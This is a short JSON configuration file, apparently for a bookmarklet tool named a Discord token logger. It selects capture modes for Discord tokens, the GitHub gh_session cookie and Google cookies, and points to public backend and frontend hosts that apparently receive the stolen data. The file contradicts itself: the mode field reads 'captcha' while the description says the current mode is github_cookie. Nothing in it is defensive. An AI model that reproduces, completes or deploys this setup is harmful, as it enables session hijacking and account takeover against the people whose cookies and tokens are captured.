{
  "bookmarkletMode": "captcha",
  "description": "Set to: captcha | token_logger | github_cookie | google_cookie. Current: github_cookie (captures gh_session cookie)",
  "backendPublicUrl": "https://discord-token-logger-backend.onrender.com",
  "backendLocalUrl": "http://localhost:8080",
  "frontendPublicUrl": "https://discord-token-logger-frontend.vercel.app"
}
